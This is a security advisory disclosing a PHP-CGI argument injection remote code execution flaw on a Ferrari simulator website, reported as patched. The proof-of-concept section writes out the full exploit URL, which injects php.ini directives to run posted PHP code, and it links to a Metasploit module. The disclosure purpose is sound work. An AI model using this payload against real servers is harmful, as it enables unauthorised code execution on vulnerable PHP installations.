Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection


Release Date:
=============
2015-08-07


Vulnerability Laboratory ID (VL-ID):
====================================
1562


Common Vulnerability Scoring System:
====================================
9.2


Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello, Silverstone and Nürburgring), while HD screens literally wrap 
180 degrees around them, delivering ultra-realistic graphics to boot. The experience perfectly illustrates the concept of the new Ferrari Store, 
which was opened just two months ago and was conceived not merely as a shopping destination but also as an entertainment venue. 
With four F1 simulators, interactive video walls and numerous multisensory positions, the new 750 square meter space treats visitors to a 
completely immersive experience of the Ferrari legend. 

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )


Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered a remote code execution vulnerability in the official ferrari online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-08-07:  Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of 
the -d flag to set php.ini directives to achieve code execution. From the advisory: ``if there is NO unescaped `=` in the query string, the string is 
split on `+` (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the ``encoded in a system-defined 
manner`` from the RFC) and then passes them to the CGI binary.`` This module can also be used to exploit the plesk 0day disclosed by kingcope and 
exploited in the wild on June 2013. (Source: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)


Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers without privilege application user account or user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

How I found the vulnerability: As part of any penetration test, fingerprinting is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12 which is known to be vulnerable to a Command execution vulnerability.

The Response: 
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

I started testing for this vulnerability manually and noticed code execution could be performed. When makeing a POST request to:

http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+
open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n

I noticed an error.
http://i.imgur.com/lFPgpyn.png

When sending some PHP script along with the POST request I noticed the script was executed. I sent this script: <?php echo(md5(kieran)); ?> and the right hash was returned.

I then did some automated testing with a metasploit script and this also gave positive results.

The exploit script can be found here: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

The POC with both manual and automated exploitation can be found here: hhttps://www.youtube.com/watch?v=vv7SMWC08eI


Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)


Security Risk:
==============
The security risk of code execution web vulnerability in the ferrari simulator online service is estimated as critical. (CVSS 9.2)


Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

        Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt